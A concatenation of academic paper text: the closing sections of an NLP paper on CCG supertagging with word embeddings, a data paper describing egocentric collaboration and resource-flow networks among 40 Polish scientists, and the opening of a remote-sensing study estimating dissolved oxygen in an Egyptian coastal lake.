POS-tag/supertag combination. We found that parsing accuracy was 0.02 higher on development data (and much slower), suggesting that the model itself is overly reliant on POS-features. 4.6 Error Analysis We have demonstrated that word embeddings are highly effective for CCG supertagging. In this sec- tion, we investigate several cases in which they are particularly helpful—by measuring supertagger performance when the POS tagger made mistakes, when words were unseen in the labelled data, and when the labelled data only contains the word with a different category. Our supertaggers show substan- tial improvements over more complex existing mod- els. Figure 3 shows performance when the POS- tagger assigns the wrong tag to a word. Both sys- tems show dramatically lower performance on these cases—the embeddings supertagger does not use POS features, but POS errors are likely to represent generally difficult examples. However, the embed- dings supertagger is almost 15% more accurate on this subset than the C&C supertagger, and with a re- laxed beam reaches 96% accuracy, showing the ad- vantages of avoiding a pipeline approach. In con- trast, the C&C tagger is not robust to POS tag- Words only seen with other categories (2%) 1 2 3 4 40 60 80 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Figure 4: Ambiguity vs. Accuracy for different su- pertaggers, on words that do occur in the training data, but not with the category required in the test data. ger errors, and asymptotes at just 82% accuracy. An alternative way of mitigating POS errors is to use a distribution over POS tags as features in the supertagger—Curran et al. (2006) show that this technique improves supertagging accuracy by 0.4% over the C&C baseline, but do not report the impact on parsing. Figure 4 shows performance when the a word has been seen in the training data, but only with a dif- ferent category from the instance in the test data (for example, European only occurs as a adjective in the training data, but it may occur as a noun in the test data). Performance is even worse on these cases, which appear to be extremely difficult for existing models. The accuracy of the embeddings supertag- ger converges at just 80%, suggesting that our model has overfit the labelled data. However, it still out- performs the C&C supertagger by 22% with a beam allowing 2 tags per word. The large jump in C&C supertagger performance for the final back-off level is due to a change in the word frequency threshold at which the C&C parser only considers word/category pairs that occur in the labelled data. Figure 5 gives results for cases where the word is unseen in the labelled data. The C&C supertag- ger performance is surprisingly good on such cases, suggesting that the morphological and context used 334 Unseen Words (4%) 1 2 3 4 94 96 98 100 Average Categories Per Word O ra cl e C at eg or y A cc ur ac y (% ) C&C Turian-50 Figure 5: Ambiguity vs. Accuracy for different supertaggers, on words which are unseen in the la- belled data. is normally sufficient for inferring categories for un- seen words. However, our supertagger still clearly outperforms the C&C supertagger, suggesting that the large vocabulary of the unsupervised embed- dings helps it to generalize from the labelled data. We also investigated supertagging accuracy on different types of word—Table 5 shows several in- teresting cases. While performance on nouns is sim- ilar, our supertagger is substantially better on verbs. Verbs can have many different CCG categories, de- pending on the number of arguments and tense, and not all valid word/category combinations will be seen in the labelled data. Our embeddings allow the supertagger to learn generalizations, such as that transitive verbs can also often have intransitive uses. Similarly, wh-words can have many possible cate- gories in complex constructions like relative clauses and pied-piping—and our embeddings may help the model generalize from having seen a category for which to one for whom. On the other hand, the C&C supertagger performs much better on prepositions. Prepositions have different categories when appear- ing as arguments or adjuncts, and the distinction in the gold-standard was made using somewhat arbi- trary heuristics (Hockenmaier and Steedman, 2007). It seems our embeddings have failed to capture these subtleties. Future work should explore methods for combining the strengths of each model. Word Type C&C Accuracy Turian-50 Embeddings Accuracy Verbs 93.9% 94.8% Nouns 97.7% 97.3% WH-words 90.1% 93.4% Prepositions 94.8% 91.2% Table 5: Supertagging accuracy on different types of words, with an ambiguity of 1.27 tags per word (corresponding to the C&C’s initial beam setting). Overall performance with this beam is almost iden- tical. Words types were identified using gold POS tags, using IN for prepositions. 4.7 Discussion With a narrow supertagger beam, our method gives similar results to the C&C supertagger. However, it gains by being more accurate on difficult cases, due to not relying on lexical or POS features. These improvements lead directly to parser improvements. We identify two cases where our supertagger greatly outperforms the C&C parser: where the POS-tag is incorrect, and where the word-category pair is un- seen in the labelled data. Our approach achieves larger improvements out-of-domain than in-domain, suggesting that the large vocabulary of embeddings built by the unsupervised pre-training allows it to better generalize from the labelled data. Interestingly, the best-performing Turian-50 em- beddings were trained on just 37M words of text (compared to 100B words for the Skip-gram embed- dings), suggesting that further improvements may well be possible using larger unlabelled corpora. Fu- ture work should investigate whether the models and embeddings that work well for supertagging gener- alize to other tasks. 5 Related Work Many methods have recently been proposed for im- proving supervised parsers with unlabelled data. Most of these are orthogonal to our work, and larger improvements may be possible by combining them. Thomforde and Steedman (2011) extends a CCG lexicon by inferring categories for unseen words, based on the likely categories of surrounding words. Unlike our method, this approach is able to learn 335 categories which were unseen in the labelled data, which is shown to be useful for parsing a corpus of questions. Deoskar et al. (2011) and Deoskar et al. (2014) use Viterbi-EM to learn new lexical en- tries by running a generative parser over a large un- labelled corpus. They show good improvements in accuracy on unseen words, but not overall parsing improvements in-domain. Their parsing model aims to capture non-local information about word usage, which would not be possible for the local context windows used to learn our embeddings. Self-training is another popular method for do- main adaptation, and was used successfully by Hon- nibal et al. (2009) to improve CCG parser perfor- mance on Wikipedia. However, it caused a decrease in performance on the in-domain data, and our method achieves better performance across all do- mains. McClosky et al. (2006) improve a Penn Tree- bank parser in-domain using self-training, but other work has failed to improve performance out-of- domain using self training (Dredze et al., 2007). In a similar spirit to our work, Koo et al. (2008) improve parsing accuracy using unsupervised word clus- ter features—we have shown that word-embeddings outperform Brown clusters for CCG supertagging. An alternative approach to domain adaptation is to annotate a small corpus of out-of-domain text. Rimell and Clark (2008) argue that this annotation is simpler for lexicalized formalisms such as CCG, as large improvements can be gained from annotat- ing lexical categories, rather than full syntax trees. They achieve higher parsing accuracies than us on biomedical text, but our unsupervised method re- quires no annotation. It seems likely that our method could be further improved by incorporating out-of- domain labelled data (where available). The best reported CCG parsing results have been achieved with a model that integrates supertagging and parsing (Auli and Lopez, 2011a; Auli and Lopez, 2011b). This work still uses the same fea- ture set as the C&C parser, suggesting further im- provements may be possible by using our embed- dings features. Auli and Lopez POS-tag the sentence before parsing, but using our features would allow us to fully eliminate the current pipeline approach to CCG parsing. Our work also builds on approaches to semi- supervised NLP using neural embeddings (Turian et al., 2010; Collobert et al., 2011b). Existing work has mainly focused on ‘flat’ tagging problems, with- out hierarchical structure. Collobert (2011) gives a model for parsing using embeddings features, by treating each level of the parse tree as a sequence classification problem. Socher et al. (2013) in- troduce a model in which context-free grammar parses are reranked based on compositional distri- butional representations for each node. Andreas and Klein (2014) experiment with a number of ap- proaches to improving the Berkeley parser with word embeddings. Such work has not improved over state-of-the-art existing feature sets for constituency parsing—although Bansal et al. (2014) achieve good results for dependency parsing using embeddings. CCG categories contain much of the hierarchical structure needed for parsing, giving a simpler way to improve a parser using embeddings. 6 Conclusions We have shown that CCG parsing can be signif- icantly improved by predicting lexical categories based on unsupervised word embeddings. The re- sulting parsing pipeline is simpler, and has improved performance both in and out of domain. We ex- pect further improvements to follow as better word embeddings are developed, without other changes to our model. Our approach reduces the problem of sparsity caused by the large number of CCG categories, suggesting that finer-grained categories could be created for CCGBank (in the spirit of Hon- nibal et al. (2010)), which lead to improved perfor- mance in downstream semantic parsers. Future work should also explore domain-adaptation, either using unsupervised embeddings trained on out-of-domain text, or using supervised training on out-of-domain corpora. Our results also have implications for other NLP tasks—suggesting that using word embeddings features may be particularly useful out-of-domain, in pipelines that currently rely on POS taggers, and in tasks which suffer from sparsity in the labelled data. Code for our supertagger is released as part of the EASYCCG parser (Lewis and Steedman, 2014), available from: https://github.com/ mikelewis0/easyccg 336 Acknowledgments We would like to thank Tejaswini Deoskar, Bharat Ram Ambati, Michael Roth and the anonymous reviewers for helpful feedback on an earlier ver- sion of this paper. We also thank Rahul Jha for sharing his re-implementation of Collobert et al. (2011b)’s model, and Stephen Clark, Laura Rimell and Matthew Honnibal for making their out-of- domain CCG corpora available. References Jacob Andreas and Dan Klein. 2014. How much do word embeddings encode about syntax. In Proceedings of ACL. Michael Auli and Adam Lopez. 2011a. A comparison of loopy belief propagation and dual decomposition for integrated CCG supertagging and parsing. In Pro- ceedings of the 49th Annual Meeting of the Associa- tion for Computational Linguistics: Human Language Technologies-Volume 1, pages 470–480. Association for Computational Linguistics. Michael Auli and Adam Lopez. 2011b. Training a log- linear parser with loss functions via softmax-margin. In Proceedings of the Conference on Empirical Meth- ods in Natural Language Processing, pages 333–343. Association for Computational Linguistics. Srinivas Bangalore and Aravind K Joshi. 1999. Su- pertagging: An approach to almost parsing. Compu- tational Linguistics, 25(2):237–265. Mohit Bansal, Kevin Gimpel, and Karen Livescu. 2014. Tailoring continuous word representations for depen- dency parsing. In Proceedings of the Annual Meeting of the Association for Computational Linguistics. Johan Bos. 2008. Wide-coverage semantic analysis with boxer. In Johan Bos and Rodolfo Delmonte, editors, Semantics in Text Processing. STEP 2008 Conference Proceedings, Research in Computational Semantics, pages 277–286. College Publications. P.F. Brown, P.V. Desouza, R.L. Mercer, V.J.D. Pietra, and J.C. Lai. 1992. Class-based n-gram models of natural language. Computational Linguistics, 18(4):467–479. Stephen Clark and James R Curran. 2007. Wide- coverage efficient statistical parsing with CCG and log-linear models. Computational Linguistics, 33(4):493–552. Michael Collins. 2002. Discriminative training meth- ods for hidden markov models: Theory and experi- ments with perceptron algorithms. In Proceedings of the ACL-02 conference on Empirical methods in natu- ral language processing-Volume 10, pages 1–8. Asso- ciation for Computational Linguistics. Ronan Collobert, Koray Kavukcuoglu, and Clément Farabet. 2011a. Torch7: A Matlab-like environment for machine learning. In BigLearn, NIPS Workshop. Ronan Collobert, Jason Weston, Léon Bottou, Michael Karlen, Koray Kavukcuoglu, and Pavel Kuksa. 2011b. Natural language processing (almost) from scratch. The Journal of Machine Learning Research, 12:2493– 2537. Ronan Collobert. 2011. Deep learning for effi- cient discriminative parsing. In Geoffrey J. Gordon, David B. Dunson, and Miroslav Dudk, editors, AIS- TATS, volume 15 of JMLR Proceedings, pages 224– 232. JMLR.org. James R Curran, Stephen Clark, and David Vadas. 2006. Multi-tagging for lexicalized-grammar parsing. In Proceedings of the 21st International Conference on Computational Linguistics and the 44th annual meet- ing of the Association for Computational Linguistics, pages 697–704. Association for Computational Lin- guistics. Tejaswini Deoskar, Markos Mylonakis, and Khalil Sima’an. 2011. Learning structural dependencies of words in the zipfian tail. In Proceedings of the 12th International Conference on Parsing Technolo- gies, pages 80–91. Association for Computational Lin- guistics. Tejaswini Deoskar, Christos Christodoulopoulos, Alexandra Birch, and Mark Steedman. 2014. Gener- alizing a Strongly Lexicalized Parser using Unlabeled Data. In Proceedings of the 14th Conference of the European Chapter of the Association for Compu- tational Linguistics. Association for Computational Linguistics. Mark Dredze, John Blitzer, Partha Pratim Talukdar, Kuz- man Ganchev, Joao Graca, and Fernando Pereira. 2007. Frustratingly hard domain adaptation for depen- dency parsing. In EMNLP-CoNLL, pages 1051–1055. Julia Hockenmaier and Mark Steedman. 2007. CCG- bank: a corpus of CCG derivations and dependency structures extracted from the Penn Treebank. Compu- tational Linguistics, 33(3):355–396. Matthew Honnibal, Joel Nothman, and James R Cur- ran. 2009. Evaluating a statistical CCG parser on Wikipedia. In Proceedings of the 2009 Workshop on The People’s Web Meets NLP: Collaboratively Con- structed Semantic Resources, pages 38–41. Associa- tion for Computational Linguistics. M. Honnibal, J.R. Curran, and J. Bos. 2010. Rebanking CCGbank for improved NP interpretation. In Proceed- ings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 207–215. Associa- tion for Computational Linguistics. Terry Koo, Xavier Carreras, and Michael Collins. 2008. Simple semi-supervised dependency parsing. 337 Jayant Krishnamurthy and Tom M. Mitchell. 2012. Weakly supervised training of semantic parsers. In Proceedings of the 2012 Joint Conference on Empir- ical Methods in Natural Language Processing and Computational Natural Language Learning, EMNLP- CoNLL ’12, pages 754–765. Association for Compu- tational Linguistics. Tom Kwiatkowski, Luke Zettlemoyer, Sharon Goldwa- ter, and Mark Steedman. 2010. Inducing probabilistic CCG grammars from logical form with higher-order unification. In Proceedings of the 2010 Conference on Empirical Methods in Natural Language Processing, EMNLP ’10, pages 1223–1233. Association for Com- putational Linguistics. Tom Kwiatkowski, Eunsol Choi, Yoav Artzi, and Luke Zettlemoyer. 2013. Scaling semantic parsers with on- the-fly ontology matching. In Proceedings of the 2013 Conference on Empirical Methods in Natural Lan- guage Processing, pages 1545–1556, Seattle, Wash- ington, USA, October. Association for Computational Linguistics. Mike Lewis and Mark Steedman. 2013a. Combined Distributional and Logical Semantics. Transactions of the Association for Computational Linguistics, 1:179– 192. Mike Lewis and Mark Steedman. 2013b. Unsupervised induction of cross-lingual semantic relations. In Pro- ceedings of the 2013 Conference on Empirical Meth- ods in Natural Language Processing, pages 681–692, Seattle, Washington, USA, October. Association for Computational Linguistics. Mike Lewis and Mark Steedman. 2014. A* CCG Pars- ing with a Supertag-factored Model. In Proceedings of the 2014 Conference on Empirical Methods in Natural Language Processing (EMNLP), Doha, Qatar, Octo- ber. Mitchell P Marcus, Mary Ann Marcinkiewicz, and Beat- rice Santorini. 1993. Building a large annotated cor- pus of English: The Penn Treebank. Computational Linguistics, 19(2):313–330. David McClosky, Eugene Charniak, and Mark Johnson. 2006. Effective self-training for parsing. In Proceed- ings of the main conference on human language tech- nology conference of the North American Chapter of the Association of Computational Linguistics, pages 152–159. Association for Computational Linguistics. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013. Efficient estimation of word representa- tions in vector space. arXiv preprint arXiv:1301.3781. Tomáš Mikolov. 2012. Statistical language models based on neural networks. Ph.D. thesis, Ph. D. the- sis, Brno University of Technology. Andriy Mnih and Geoffrey E Hinton. 2008. A scal- able hierarchical distributed language model. In NIPS, pages 1081–1088. Joakim Nivre, Laura Rimell, Ryan McDonald, and Carlos Gómez Rodrı́guez. 2010. Evaluation of dependency parsers on unbounded dependencies. In Proceedings of the 23rd International Conference on Computa- tional Linguistics (Coling 2010), pages 833–841, Bei- jing, China, August. Coling 2010 Organizing Commit- tee. Naoaki Okazaki. CRFsuite: a fast implementation of conditional random fields (CRFs). Sampo Pyysalo, Filip Ginter, Juho Heimonen, Jari Björne, Jorma Boberg, Jouni Järvinen, and Tapio Salakoski. 2007. Bioinfer: a corpus for information extraction in the biomedical domain. BMC bioinfor- matics, 8(1):50. Laura Rimell and Stephen Clark. 2008. Adapting a lexicalized-grammar parser to contrasting domains. In Proceedings of the Conference on Empirical Methods in Natural Language Processing, pages 475–484. As- sociation for Computational Linguistics. Laura Rimell and Stephen Clark. 2009. Porting a lexicalized-grammar parser to the biomedical domain. Journal of Biomedical Informatics, 42(5):852–865. Laura Rimell, Stephen Clark, and Mark Steedman. 2009. Unbounded dependency recovery for parser evalua- tion. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing: Volume 2-Volume 2, pages 813–821. Association for Computational Linguistics. Richard Socher, John Bauer, Christopher D Manning, and Andrew Y Ng. 2013. Parsing with compositional vec- tor grammars. In In Proceedings of the ACL confer- ence. Citeseer. Emily Thomforde and Mark Steedman. 2011. Semi- supervised CCG lexicon extension. In Proceedings of the Conference on Empirical Methods in Natural Lan- guage Processing, pages 1246–1256. Association for Computational Linguistics. Joseph Turian, Lev Ratinov, and Yoshua Bengio. 2010. Word representations: a simple and general method for semi-supervised learning. In Proceedings of the 48th Annual Meeting of the Association for Computational Linguistics, pages 384–394. Association for Computa- tional Linguistics. 338 work_snu7ev4j6feerkn7ytzjegmmb4 ---- 25© 2020 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). Issue 1 | Vol. 40Article | DOI: 10.21307/connections-2019.010 CONNECTIONS Academic Collaboration via Resource Contributions: An Egocentric Dataset Michał Bojanowski,1,* Dominika Czerniawska2 and Wojciech Fenrich3 1Kozminski University, Warsaw, Poland. 2University of Manchester, Manchester, UK and University of Warsaw, Warsaw, Poland. 3University of Warsaw, Warsaw, Poland. *E-mail: michal2992@gmail.com Abstract In order to understand scientists’ incentives to form collaborative relations, we have conducted a study looking into academically relevant resources, which scientists contribute into collaborations with others. The data we describe in this paper are an egocentric dataset assembled by coding originally qualitative material. It is 40 multiplex ego networks containing data on individual attributes (such as gender, scientific degree), collaboration ties (including alter–alter ties), and resource flows. Resources are coded using a developed inventory of 25 types of academically relevant resources egos and alters contribute into their collaborations. We share the data with the research community with the hopes of enriching knowledge and tools for studying sociological and behavioral aspects of science as a social process. Keywords Collaboration networks, Resources, Sociology of science, Ego networks. Scientometric studies report steadily increasing trend in multi-authored scientific publications. It is clearly an evidence that contemporary science requires cooperation and is not anymore a traditionally individualistic activity (Moody, 2004). The presented data set comes from a study in which our overarching research goal was to understand why some scientists collaborate, but some others do not. In particular, our approach was to think about incentives that might lead them to do so. Inspired by Coleman (1994) and, among others, Laudel (2001), Lewis et al. (2012) as well as our earlier results (Czerniawska et al., 2018), we assume that the incentives to collaborate come from academically relevant resources the scientists possess or control and the interests they might have in resources possessed or controlled by others. For example, a theorist and an experimentalist might be interested in each other’s resources – ability to develop theoretical model of the studied problem and skills in conducting experiments, respectively. Unequal distribution of these resources across academic community and the necessity of pooling them to get ahead in contemporary science results in incentives to collaborate. Current state of knowledge still lacks a universally accepted behavioral understanding of the scientific process, let alone standardized tools for measuring academically relevant resources. Hence, we conducted a qualitative study among Polish scientists with the goal to: 1. collect egocentric data on collaborative relations; 2. develop an inventory of academically relevant resources from respondents’ reports; and 3. measure what resources (Item 2) collaborating parties (ego and alters) engage in their collab- oration ties (Item 1). The data we hereby share are based on transcriptions and coding of the originally qualitative material. The second section provides some brief background information on science in Poland and details our contribution. The presented study involved 40 interviews conducted on a sample of Polish scientists, 26 Academic Collaboration via Resource Contributions: An Egocentric Dataset which we describe further in the third section. In the fourth section, we describe the way in which the inventory of resources was constructed. A complete list with example quotes is provided on the associated website.1 The fifth section describes the structure of the data set. The sixth section provides illustrative examples. The seventh section provides the details where the data can be found and how it can be accessed. Finally, in the eight section, we discuss limitations and potential uses of the data. Background and contribution The presented data come from a study, which was conducted in Poland among Polish researchers. Polish scientific community is among the largest in Europe: according to OECD (2019) statistics, there were 132,000 researchers in Poland in 2016. At the same time, the funding and material resources are only average (cf. Czerniawska, 2018; Kwiek and Szadkowski, 2018). These conditions, next to some others, keep Polish science largely outside of the strict core of international scientific collaboration (Leydesdorff et al., 2013). The organization and institutions of Polish scientific system resemble “Continental” systems (e.g. German scientific system). A typical scientific career requires a four year PhD program, a habilitation which is expected within eight years after a PhD. Obtaining a habilitation is perceived as the final step to becoming an independent scholar. Polish scientific community, similarly to many other scientific communities in Europe, is rather diverse. It is a mix of modern, competitive, internationalized disciplines and groups, and more conservative locally oriented areas (Kwiek, 2018). Explaining the presence or absence of collabo- ration relations among scientists by referring to complementarities between them is not a new idea. For example, Qin et al. (1997) in their bibliometric analysis use institutional affiliation to capture different specialization of scientists. Moody (2004) approximates different types of contributions by analyzing subject codes put on articles indexed by Sociological Abstracts. Our goal was to collect a list of resources they believe are relevant when working as a scientist. We believe a genuine contribution of the presented data set lies in that detailed information on the flow of resources in scientific collaborations. The catalogue, which is a unique contribution in scientific collaboration studies, was constructed based on the extensive literature review and themes mentioned by our interviewees. The data have been used to study whether structurally non-redundant ties are more likely to be characterized with resource contributions not found in other ties (Bojanowski and Czerniawska, 2020). Sample Data come from 40 individual in-depth interviews (IDI) conducted between April and August 2016 by two interviewers. The quota sample consists of 20 female and 20 male scientists from six Polish cities. Respondents represented a broad range of disciplines: natural sciences, social sciences, life sciences, the humanities, engineering, and technology on different levels of career from PhD candidates to professors. The interviewees mentioned 334 collaborators in total. Interviews lasting between 24 and 90 min were recorded and later transcribed. Measurement Each interview consisted of several parts, three of which are of relevance here: 1. Respondents were asked to name up to 10 important researchers they have collaborated with during last five years. Each collaborator was discussed separately giving information about gender, scientific degree, nationality, and university department (if possible). See Section 5.1 below. 2. During the interview a network of collaboration among collaborators mentioned in item (1) was reconstructed using cork board, pins, and rub- ber bands. See the example in Figure 1. Cork boards were photographed and later digitized into edgelist data. See Section 5.2 below. 3. For each collaborator, the respondents were asked about academically relevant resources he/she contributed to the collaboration and what resources were contributed by the col- laborator. Interviewees were provided with a broad framework, which would help them iden- tify resources such as financial resources (e.g. funding), human resources (e.g. knowledge, skills), and social resources (e.g. collaborators). 4. Interviews were audio-recorded and later transcribed. The text of the transcripts was analyzed using QDA Miner Lite2 in order to code 2 A product of Provalis Research, see https://provalisresearch. com/products/qualitative-data-analysis-software/. 1At https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. 27 CONNECTIONS resources engaged by respondents (the egos) and their collaborators (the alters) to every col- laboration. The coding was performed by two persons. Random sample of the interviews was double-checked by different researchers to ensure reliability. The data are available in table resources and described in detail below. While collaboration networks assembled from part (2) include alter–alter ties, the data on resources from part (3) were acquired for ego-alter dyads only. Structure of the data The data are contained in three inter-related tables diagrammatically presented in Figure 2. Below we describe each table in detail. Node attributes The table nodes contain information about every person in the study – all egos and all alters. It has 374 rows and the following seven variables: • id _ interview – Interview identification number. • id _ node – Person identification number, unique within each interview. • is _ ego – Binary variable equal to 1 if person is the ego (respondent), 0 otherwise. • is _ polish – Binary variable equal to 1 if person is affiliated with a Polish academic in- stitution, 0 otherwise. • department – Marking scientists if they work at the same department. If department is not missing then all scientist within the same inter- view sharing the same value of department work at the same department at the same university. • scidegree – Scientific degree of the scientist. One of “mgr” = MA, “dr” = PhD, “drhab” = habili- tated doctor, or “prof” = full professor. • female – Binary variable equal to 1 if person is female, 0 if male. Pair of variables id _ interview and id _ node together constitutes a key uniquely identifying each row in the nodes table. Collaboration networks The table collaboration is essentially an edge list of collaboration ties. It has 1,732 rows and the following three variables: • id _ interview – Interview identification number. Figure 1: Using cork board, pins, and rubber bands to collect data on collaborations. Small cards contained names or nicknames which have been masked. Figure 2: The data consist of three interrelated tables. Table ‘nodes’ contains information about all persons. Table ‘collaboration’ is an edgelist of collaboration ties. Table ‘resources’ is a multiplex edgelist of resource flows. 28 Academic Collaboration via Resource Contributions: An Egocentric Dataset • from and two – Person identification numbers referencing the id _ node variable from the nodes table. In other words, a row consisting of values, say, id _ interview = 1, from = 2, to = 3 indicates that researchers 2 and 3 where reported as collaborating in the interview 1. Resource contributions Data about resources engaged by respondents (egos) and their collaborators (alters) to every collaboration were coded based on transcripts. The data are provided in table resources having 1,761 rows and the following four columns: • id _ interview – interview identification number. • from and two – person identification numbers (within each interview) referencing the id _ node variable from the nodes table. • code – a textual code identifying type of re- source contributed by researcher from into the collaboration with researcher to. Resources engaged in collaborations (variable code) were coded with a coding scheme covering different elements of a research process in different disciplines. The scheme consists of 25 codes such as: • ‘Conceptualisation’ – coming up with an idea for a study, providing general theoretical framework; designing a general framework for a study. • ‘Methodology’ – designing methodology for a study. • ‘Investigation’ – conducting research, gather- ing data. • ‘Data analysis’ – data analysis, quantitative as well as qualitative. • ‘Data curation’ – managing and archiving data. • ‘Software creation’ – writing software for re- search process. • ‘Prototype construction’ – building a proto- type that is used in research process. Complete list of codes together with examples of coded interview fragments is available at the website.3 Table 1. Frequencies of gender and scientific degree for egos and alters. Symbol ‘–’(dash) corresponds to missing data. Gender Degree Alter Ego Female Full professor 20 3 Female habilitated PhD 11 5 Female MA 19 3 Female PhD 57 7 Male Full professor 87 8 Male habilitated PhD 23 4 Male MA 28 1 Male PhD 63 9 – MA 3 – – PhD 1 – – – 22 – Selected descriptives As a glimpse into the data, Table 1 shows frequency distribution of gender and scientific degree for egos and alters separately. Figure 3 shows resource flow networks from one of the interviews: Accessing the data The data are available in a GitHub repository at https://recon-icm.github.io/reconqdata as an R package with accessible files in a CSV format. Users can use the data with R by installing the package or download the data files in CSV format using URLs provided in the README file. Discussion We close by discussing potential uses and limitations of the documented data set. We think that the data we share can be used in several contexts with substantive and methodological goals in mind. On the substantive side, the data can be used to address several research questions. For example to analyze co-appearance of different types of resources in collaboration ties – certain 3https://recon-icm.github.io/reconqdata/articles/resource_ inventory.html. 29 CONNECTIONS Figure 3: Collaboration (dashed, undirected) and resource flow (solid, directed) ties from one of the interviews. types of resources tend to be contributed together. Further, the resource catalog could be improved and perhaps serve as a starting point for constructing a more standardized survey instrument. On the methodological side, the value of the data set is that it is egocentric and multiplex at the same time. We see active development in statistical models for data collected through egocentric design (Krivitsky and Morris, 2017) as well as in modeling multilayer networks (Krivitsky et al., 2019). The data we share can be a useful test bed for such models. The data have certain limitations. First, it comes from a qualitative study conducted on a quota sample. The obvious limitation is the lack of representativeness in the strict statistical sense. Nevertheless, it is representative in the loose sense – the respondents come from universities from different regions and of different size, from different disciplines and at different stages of scientific career. We believe it does cover the diversity of scientific positions pretty well. Second, the data contain several instances of resource flows between the alters. However, the reliability of this data is rather low. Majority of respondents did not have enough information or were otherwise not confident enough in reporting the resource contributions. Consequently, these data were not collected systematically. Acknowledgments The authors thank (Polish) National Science Cen- tre for support through SONATA grant 2012/07/D/ HS6/01971 for the project Dynamics of Competition and Collaboration in Science: Individual Strategies, Collaboration Networks, and Organizational Hierar- chies (http://recon.icm.edu.pl). References Bojanowski, M. and Czerniawska, D. 2020. Reaching for unique resources: Structural holes and specialization in scientific collaboration networks. Journal of Social Structure. Forthcoming. Preprint available on-line, available at: http://recon.icm.edu.pl/ wp-content/uploads/2019/05/exchange_networks.pdf. 30 Academic Collaboration via Resource Contributions: An Egocentric Dataset Coleman, J. S. 1994. Foundations of Social Theory, Harvard University Press, Cambridge, MA. Czerniawska, D. 2018. Sieci współpracy i wymiany w centrach i na peryferiach. Przypadek polskiej nauki (PhD thesis). University of Warsaw, Warsaw, Poland. Czerniawska, D., Fenrich, W. and Bojanowski, M. 2018. Actors, relations, and networks: Scholarly collaboration beyond bibliometric measures. Polish Sociological Review, 202: 167–185. Krivitsky, P. N. and Morris, M. 2017. Inference for social network models from egocentrically sampled data, with application to understanding persistent racial disparities in HIV prevalence in the US. The Annals of Applied Statistics, 11(1): 427–455. Krivitsky, P. N., Koehly, L. M. and Marcum, C. S. 2019. Exponential-family random graph models for multi-layer networks. SocArXiv, available at: https://doi.org/10.31235/ osf.io/dqe9b (accessed August 14, 2019). Kwiek, M. 2018. Changing European Academics: A Comparative Study of Social Stratification, Work Patterns and Research Productivity. Routledge, London. Kwiek, M. and Szadkowski, K. 2018. Higher education systems and institutions, Poland. In Teixeira, P., Shin, J. C., Amaral, A., Bernasconi, A., Magalhaes, A., Kehm, B. M. and Nokkala, T. (Eds), Encyclopedia of International Higher Education Systems and Institutions, Springer, pp. 1–10, available at: https://doi.org/10.1007/978-94-017- 9553-1_375-1. Laudel, G. 2001. Collaboration, creativity and rewards: why and how scientists collaborate. International Journal of Technology Management, 22(7–8): 762–781. Lewis, J. M., Ross, S. and Holden, T. 2012. The how and why of academic collaboration: disciplinary differences and policy implications. Higher Education, 64(5): 693–708. Leydesdorff, L., Wagner, C., Park, H. W. and Adams, J. 2013. International collaboration in science: the global map and the network, available at: http:// arxiv.org/abs/1301.0801 (accessed August 10, 2019). Moody, J. 2004. The structure of a social science collaboration network: disciplinary cohesion from 1963 to 1999. American Sociological Review, 69(2): 213–238. OECD. 2019. OECD science, technology and R&D statistics: main science and technology indicators, available at: https://data.oecd.org (accessed August 10, 2019). Qin, J., Lancaster, F. W. and Allen, B. 1997. Types and levels of collaboration in interdisciplinary research in the sciences. Journal of the American Society for Information Science, 48(10): 893–916. work_sobah75y3vbb7l3xrdslmpf2la ---- DOI: 10.21307/ijanmc-2019-059 International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 53 Assessment of a Non-Optical Water Quality Property Using Space-based Imagery in Egyptian Coastal Lake Hala O. Abayazid and Ahmed El-Adawy Coastal Research Institute National Water Research Center Ministry of Water Resources and Irrigation Hala Osman Moukhtar Abayazid: e-mail: halazid@yahoo.com address: 89 Al-Essawy street, Sidi Beshr Alexandria-Egypt Abstract—Progressive anthropogenic intrusion and increasing water demand necessitate frequent water quality monitoring for sustainability management. Unlike laborious, time consuming field-based measurements, remote sensing-based water quality retrieval proved promising to overcome difficulties with temporal and spatial coverage. However, remotely estimated water quality parameters are mostly related to visibility characteristic and optically active property of water. This study presents results of an investigated approach to derive oxygen –related water quality parameter, namely Dissolved Oxygen (DO), in a shallow inland water body from satellite imagery. The approach deduces DO levels based on interrelated optical properties that dictate oxygen consumption and release in waters. Comparative analysis of multiple regression algorithms was carried out, using various combinations of parameters; namely, Turbidity, Total Suspended Solids (TSS), Chlorophyll-a, and Temperature. To cover the wide range of conditions that is experienced by Edku coastal lake, ground truth measurements covering the four seasons were used with corresponding satellite imageries. While results show successful statistically significant correlation in certain combinations considered, yet optimal results were concluded with Turbidity and natural logarithm of temperature. The algorithm model was developed with summer and fall data (R2 0.79), then validated with winter and spring data (R2 0.67). Retrieved DO concentrations highlighted the variability in pollution degree and zonation nature within that coastal lake, as related to boundary interactions and irregularity in flow dynamics within. The approach presented in this study encourages expanded applications with space-based earth observation products for exploring non-detectable water quality parameters that are interlinked with optically active properties in water. Keywords-Remote Sensing; Algorithm Model; Coastal lake; Dissolved Oxygen I. INTRODUCTION Increasing demands and progressive development process have compromised sustainability potential of the coastal lakes in Egypt. The quality of water resources dictates beneficial uses offered as well as functionality of the aquatic ecosystem, especially with the alarming pollution level associated with the anthropogenic activities. Thus, continuous monitoring and frequent update of water resources status are required for sound management planning and corrective measure scenarios. However, such tasks require comprehensive data collection with adequate temporal and spatial coverage. Remote sensing is an advancing field that has the potential in reducing field work difficulties, and increasingly considered an essential planning tool. A. Remote Sensing-based Water Quality Retrieval Several studies in literature have addressed retrieval of water quality parameters using remote sensing techniques. Significant correlations have been found between specific water quality parameters and reflectance measured with satellite sensors. These parameters cause change to the spectral properties of reflected light and, hence, are remotely detectable (Gholizadeh et al., 2016). Recent research by Swain and Sahoo (2017) argued that certain conservative pollutants can be distinctively detected with different reflectance received in the electromagnetic spectrum because no biochemical reactions or ionic exchange are experienced. Retrieving properties such as water clarity; turbidity, and Total Suspended Solids (TSS) concentrations mailto:halazid@yahoo.com International Journal of Advanced Network, Monitoring and Controls Volume 04, No.03, 2019 54 using earth observation imageries have been tackled in applied research studies worldwide (Kloiber et al. 2002; Zhang, 2002; Bilge et al., 2003; He et al., 2008; 